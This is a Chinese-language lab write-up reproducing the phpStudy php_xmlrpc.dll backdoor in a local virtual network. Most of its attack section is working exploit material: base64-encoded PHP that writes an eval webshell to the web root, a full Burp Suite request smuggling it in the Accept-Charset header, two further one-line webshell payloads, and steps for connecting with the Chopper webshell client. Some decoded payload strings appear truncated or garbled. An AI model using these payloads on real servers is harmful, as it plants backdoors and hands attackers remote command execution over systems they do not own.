漏洞简介
phpStudy在下列文件中存在后门
phpStudy2016
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
测试环境的搭建
环境
- vmware workstation14
- win7网站(ip 192.168.43.196)
- win10攻击者(ip 192.168.43.253)
- burpsuite
- phpstudy2018
安装phpstudy2018
安装成功image.png
使用notepad++打开 C:\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll,检索eval,如下图所示,说明存在后门
php_xmlrpc.dll中含有后门.png
后门的利用
通过burpsuite抓包,客户端可以通过HTTP头部的Accept-Charset字段来向后台提交命令
执行命令
写入shellcode
In [15]: def b64encode(a):
...: print(base64.b64encode(a.encode('utf-8')))
In [30]: b64encode(r"""$f @eval(\$_POST['cmd']); ?>"); fclose($f);""")
b'JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs='
使用burpsuiter repeater模块写入webshell,HTTP头部如下
GET / HTTP/1.1
Host: 192.168.43.196
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Charset: JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=
Accept-Encoding: gzip,deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 2
两个一句话木马
atob('c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=')
"system('echo ^<?php
atob('JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=')
"$f @eval(\\$_POST['cmd']); ?>\");fclose($f);"
使用菜刀连接
使用菜刀连接
打开shell
参考资料
- Phpstudy漏洞复现利用
- poc